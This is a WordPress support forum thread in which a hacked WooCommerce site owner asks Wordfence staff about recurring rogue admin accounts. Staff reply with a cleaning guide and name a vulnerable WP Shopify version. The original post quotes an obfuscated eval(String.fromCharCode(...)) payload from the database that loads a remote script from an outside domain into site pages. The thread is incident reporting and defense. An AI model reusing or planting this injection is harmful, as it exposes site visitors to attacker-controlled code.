Title: Admin User creating attack Last modified: October 3, 2019 --- # Admin User creating attack * Resolved [saruncloudspring](https://wordpress.org/support/users/saruncloudspring/) * (@saruncloudspring) * [6 years, 8 months ago](https://wordpress.org/support/topic/admin-user-creating-attack-2/) * I am facing new admin user creation attack on one of my woocommerce site. The admin user are created with systemusers username and using [systemusers@gmailen.com](https://wordpress.org/support/topic/admin-user-creating-attack-2/systemusers@gmailen.com?output_format=md) as email address. After creating the user admin and user are getting new user created email notifications. Anyone here face this same problem before??how I can protect my site from this attack??? * When first time user created I found one vulnerable plugin on my site from wordfence scan I have deleted that plugin now and installed iTheme security pro version and enabled 2FA for admin users but after that still 5 times that user is creating on my site. * When i checking DB i have found following code in wp_postmeta table * {“settings”:{“wps_settings_general_products_url”:”””eval(String.fromCharCode( 32,40,102,117,110,99,116,105,111,110,40,41,32,123,10,32,32,32,32,118,97,114,32,101,108,101,109,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,32,10,9,101,108,101,109,46,116,121,112,101,32,61,32,39,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,39,59,32,10,32,32,32,32,101,108,101,109,46,115,114,99,32,61,32,39,104,116,116,112,115,58,47,47,98,101,115,46,98,101,108,97,116,101,114,98,101,119,97,115,116,104,101,114,101,46,99,111,109,47,99,111,114,110,47,102,108,101,120,46,106,115,63,116,112,61,52,39,59,10,32,32,32,32,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,104,101,97,100,34,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,101,108,101,109,41,59,10,32,32,125,41,40,41,59)) >” * On this following document wordfence saying this type of attack will protected but its not protected why its not protecting and how this attack come?? [https://www.wordfence.com/blog/2019/08/ongoing-malvertising-campaign-continues-exploiting-new-vulnerabilities/](https://www.wordfence.com/blog/2019/08/ongoing-malvertising-campaign-continues-exploiting-new-vulnerabilities/) Viewing 5 replies - 1 through 5 (of 5 total) * Thread Starter [saruncloudspring](https://wordpress.org/support/users/saruncloudspring/) * (@saruncloudspring) * [6 years, 8 months ago](https://wordpress.org/support/topic/admin-user-creating-attack-2/#post-11996686) * why no response from your side ? * Plugin Support [wfphil](https://wordpress.org/support/users/wfphil/) * (@wfphil) * [6 years, 8 months ago](https://wordpress.org/support/topic/admin-user-creating-attack-2/#post-12002090) * Hi [@saruncloudspring](https://wordpress.org/support/users/saruncloudspring/) * I am sorry to hear that you have been hacked. * The indicators of compromise that you have mentioned do not match the indicators of compromise in our blog post that you linked to. * Please follow our complete site cleaning guide here: * [https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/](https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/) * I have passed your provided information to our threat intelligence team for you. * [WFGerroald](https://wordpress.org/support/users/wfgerald/) * (@wfgerald) * [6 years, 7 months ago](https://wordpress.org/support/topic/admin-user-creating-attack-2/#post-12057642) * We haven’t heard back from you in a while, so I’ve gone ahead and marked this thread as resolved. * Please feel free to open another thread if you have any other issues. * Thanks, * Gerroald * Thread Starter [saruncloudspring](https://wordpress.org/support/users/saruncloudspring/) * (@saruncloudspring) * [6 years, 7 months ago](https://wordpress.org/support/topic/admin-user-creating-attack-2/#post-12057822) * I have created the new topic about this issue the issue is not solved yet i have followed your site cleaning process * Plugin Support [wfphil](https://wordpress.org/support/users/wfphil/) * (@wfphil) * [6 years, 7 months ago](https://wordpress.org/support/topic/admin-user-creating-attack-2/#post-12121928) * Hi [@saruncloudspring](https://wordpress.org/support/users/saruncloudspring/) * A custom firewall rule is now available for users of the free version of Wordfence that protects against the vulnerability that lead to this hack in WP Shopify <= 2.0.4 * This vulnerability was fixed in the plugin version 2.0.5: * [https://wordpress.org/plugins/wpshopify/#developers](https://wordpress.org/plugins/wpshopify/#developers) * It is imperative for the security of your site to keep WordPress, your theme and plugins updated. Viewing 5 replies - 1 through 5 (of 5 total) The topic ‘Admin User creating attack’ is closed to new replies. * ![](https://ps.w.org/wordfence/assets/icon.svg?rev=2070865) * [Wordfence Security - Firewall, Malware Scan, and Login Security](https://wordpress.org/plugins/wordfence/) * [Frequently Asked Questions](https://wordpress.org/plugins/wordfence/#faq) * [Support Threads](https://wordpress.org/support/plugin/wordfence/) * [Active Topics](https://wordpress.org/support/plugin/wordfence/active/) * [Unresolved Topics](https://wordpress.org/support/plugin/wordfence/unresolved/) * [Reviews](https://wordpress.org/support/plugin/wordfence/reviews/) * 5 replies * 3 participants * Last reply from: [wfphil](https://wordpress.org/support/users/wfphil/) * Last activity: [6 years, 7 months ago](https://wordpress.org/support/topic/admin-user-creating-attack-2/#post-12121928) * Status: resolved